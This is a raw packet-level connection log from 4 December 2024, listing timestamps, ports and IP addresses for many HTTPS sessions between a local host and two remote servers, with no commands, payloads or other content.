Dec 4, 2024 12:17:31.625328064 CET	49834	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.625345945 CET	443	49834	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.625847101 CET	49834	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.625852108 CET	443	49834	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.632870913 CET	443	49828	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.632950068 CET	443	49828	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.633024931 CET	49828	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.633212090 CET	49828	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.633212090 CET	49828	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.633234024 CET	443	49828	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.633243084 CET	443	49828	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.636279106 CET	49839	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.636343956 CET	443	49839	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.636826038 CET	49839	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.636956930 CET	49839	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.636970043 CET	443	49839	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.678695917 CET	443	49833	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.681673050 CET	49833	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.681723118 CET	443	49833	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.682189941 CET	49833	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.682194948 CET	443	49833	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.713603020 CET	443	49836	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.717514038 CET	49836	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.717535973 CET	443	49836	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.717964888 CET	49836	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.717972994 CET	443	49836	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.886981964 CET	443	49837	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.887617111 CET	49837	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.887648106 CET	443	49837	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:31.888137102 CET	49837	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:31.888142109 CET	443	49837	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.057574034 CET	443	49834	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.057648897 CET	443	49834	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.057934046 CET	49834	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.058038950 CET	49834	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.058080912 CET	443	49834	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.058240891 CET	49834	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.058259010 CET	443	49834	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.060902119 CET	49840	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.060956955 CET	443	49840	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.061041117 CET	49840	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.061220884 CET	49840	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.061238050 CET	443	49840	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.122282028 CET	443	49833	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.122361898 CET	443	49833	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.122622967 CET	49833	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.122663975 CET	49833	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.122682095 CET	443	49833	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.122694016 CET	49833	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.122701883 CET	443	49833	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.125911951 CET	49841	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.125948906 CET	443	49841	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.126032114 CET	49841	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.126213074 CET	49841	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.126225948 CET	443	49841	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.148332119 CET	443	49836	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.148394108 CET	443	49836	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.148497105 CET	49836	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.148797035 CET	49836	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.148813963 CET	443	49836	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.148834944 CET	49836	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.148840904 CET	443	49836	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.151218891 CET	49842	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.151252985 CET	443	49842	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.151340008 CET	49842	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.151448965 CET	49842	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.151463032 CET	443	49842	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.331162930 CET	443	49837	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.331229925 CET	443	49837	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.331299067 CET	49837	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.331577063 CET	49837	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.331595898 CET	443	49837	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.331605911 CET	49837	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.331612110 CET	443	49837	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.334440947 CET	49843	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.334482908 CET	443	49843	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.334558010 CET	49843	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.334695101 CET	49843	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:32.334709883 CET	443	49843	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:32.448990107 CET	443	49838	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:32.449059010 CET	49838	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:32.449595928 CET	49838	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:32.449604988 CET	443	49838	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:32.451607943 CET	49838	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:32.451613903 CET	443	49838	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:33.174922943 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:33.175013065 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:33.175046921 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:33.175075054 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:33.248605967 CET	49835	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:33.248636961 CET	443	49835	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:33.353153944 CET	443	49839	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.362237930 CET	49839	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.362262964 CET	443	49839	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.362730026 CET	49839	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.362735033 CET	443	49839	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.512995958 CET	443	49838	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:33.513056040 CET	49838	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:33.513068914 CET	443	49838	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:33.513109922 CET	49838	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:33.515851021 CET	49838	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:33.515870094 CET	443	49838	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:33.779001951 CET	443	49840	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.779908895 CET	49840	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.779932022 CET	443	49840	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.780417919 CET	49840	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.780421972 CET	443	49840	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.788928032 CET	443	49839	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.788997889 CET	443	49839	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.789052010 CET	49839	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.789231062 CET	49839	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.789243937 CET	443	49839	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.789257050 CET	49839	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.789262056 CET	443	49839	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.820379972 CET	49844	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.820408106 CET	443	49844	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.820477962 CET	49844	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.820684910 CET	49844	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.820698977 CET	443	49844	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.906168938 CET	443	49841	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.906749010 CET	49841	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.906774044 CET	443	49841	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.907227993 CET	49841	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.907233000 CET	443	49841	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.933372021 CET	443	49842	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.933849096 CET	49842	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.933867931 CET	443	49842	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:33.934324980 CET	49842	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:33.934330940 CET	443	49842	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.075381041 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:34.075427055 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:34.075508118 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:34.075776100 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:34.075786114 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:34.115154982 CET	443	49843	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.115870953 CET	49843	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.115901947 CET	443	49843	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.116408110 CET	49843	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.116413116 CET	443	49843	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.213675976 CET	443	49840	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.213756084 CET	443	49840	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.213826895 CET	49840	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.214045048 CET	49840	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.214061022 CET	443	49840	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.214071035 CET	49840	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.214076996 CET	443	49840	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.222420931 CET	49846	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.222450018 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.222522974 CET	49846	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.222693920 CET	49846	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.222706079 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.351398945 CET	443	49841	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.351468086 CET	443	49841	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.351670980 CET	49841	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.352118969 CET	49841	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.352138042 CET	443	49841	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.352165937 CET	49841	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.352171898 CET	443	49841	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.355391979 CET	49847	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.355426073 CET	443	49847	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.355509043 CET	49847	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.355699062 CET	49847	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.355710983 CET	443	49847	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.377578020 CET	443	49842	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.377639055 CET	443	49842	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.377684116 CET	49842	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.377810001 CET	49842	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.377824068 CET	443	49842	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.377836943 CET	49842	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.377840996 CET	443	49842	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.379978895 CET	49848	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.380003929 CET	443	49848	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.380079985 CET	49848	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.380208969 CET	49848	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.380223036 CET	443	49848	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.558486938 CET	443	49843	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.558537960 CET	443	49843	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.558655977 CET	49843	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.567517996 CET	49843	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.567542076 CET	443	49843	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.567557096 CET	49843	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.567564011 CET	443	49843	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.570843935 CET	49849	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.570878029 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:34.570985079 CET	49849	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.571156025 CET	49849	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:34.571170092 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:35.102749109 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.102792025 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.102869034 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.103276968 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.103292942 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.527010918 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.527065992 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.528034925 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.528044939 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.530601978 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.530611992 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.530684948 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.530693054 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.530699015 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.530713081 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.530740976 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.530745029 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.530781031 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.530787945 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.530838966 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.530848026 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.530919075 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.530932903 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.530956030 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.530966043 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.531203032 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.531213045 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.531232119 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.531240940 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.531265974 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.531275034 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.531282902 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:35.531302929 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:35.602814913 CET	443	49844	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:35.615123987 CET	49844	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:35.615166903 CET	443	49844	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:35.615556955 CET	49844	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:35.615564108 CET	443	49844	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.003856897 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.042391062 CET	49846	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.042413950 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.046535015 CET	49846	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.046540976 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.046628952 CET	443	49844	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.046696901 CET	443	49844	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.046741009 CET	49844	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.050626993 CET	49844	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.050641060 CET	443	49844	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.050648928 CET	49844	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.050653934 CET	443	49844	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.063728094 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.063765049 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.063823938 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.064088106 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.064100981 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.136503935 CET	443	49847	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.139213085 CET	49847	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.139244080 CET	443	49847	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.139828920 CET	49847	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.139837027 CET	443	49847	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.197639942 CET	443	49848	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.203919888 CET	49848	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.203948975 CET	443	49848	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.205816984 CET	49848	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.205822945 CET	443	49848	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.286318064 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.290909052 CET	49849	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.290930033 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.291383982 CET	49849	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.291388035 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.453142881 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.453175068 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.453231096 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.453249931 CET	49846	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.453289986 CET	49846	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.453624964 CET	49846	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.453644991 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.453656912 CET	49846	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.453661919 CET	443	49846	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.457079887 CET	49852	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.457125902 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.457194090 CET	49852	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.457470894 CET	49852	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.457480907 CET	443	49852	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.500355959 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.500858068 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.501225948 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.501235962 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.503835917 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.503835917 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.503845930 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.503860950 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.503930092 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.503930092 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.503935099 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.503946066 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.503984928 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.503993034 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.504132986 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.504139900 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.504160881 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.504165888 CET	49850	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:36.504170895 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.504180908 CET	443	49850	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:36.580605030 CET	443	49847	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.580674887 CET	443	49847	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.580720901 CET	49847	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.580981016 CET	49847	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.580998898 CET	443	49847	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.584506989 CET	49853	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.584542990 CET	443	49853	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.584604979 CET	49853	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.584777117 CET	49853	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.584786892 CET	443	49853	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.641691923 CET	443	49848	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.641777039 CET	443	49848	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.641829014 CET	49848	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.642040014 CET	49848	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.642062902 CET	443	49848	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.642074108 CET	49848	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.642079115 CET	443	49848	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.645459890 CET	49854	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.645510912 CET	443	49854	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.645591974 CET	49854	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.645807981 CET	49854	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.645823956 CET	443	49854	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.726125002 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.726150990 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.726200104 CET	49849	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.726227045 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.726427078 CET	49849	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.726438046 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.726448059 CET	49849	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.726576090 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.726603031 CET	443	49849	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.726633072 CET	49849	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.729321957 CET	49855	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.729361057 CET	443	49855	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:36.729433060 CET	49855	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.729562044 CET	49855	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:36.729572058 CET	443	49855	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:37.390007973 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:37.390078068 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:37.390115023 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:37.390139103 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:37.391153097 CET	49845	443	192.168.2.4	159.69.102.165
Dec 4, 2024 12:17:37.391171932 CET	443	49845	159.69.102.165	192.168.2.4
Dec 4, 2024 12:17:37.852669001 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:37.853286028 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:37.853321075 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:37.853789091 CET	49851	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:17:37.853794098 CET	443	49851	13.107.246.63	192.168.2.4
Dec 4, 2024 12:17:38.005292892 CET	443	49850	159.69.102.165	192.168.2.4
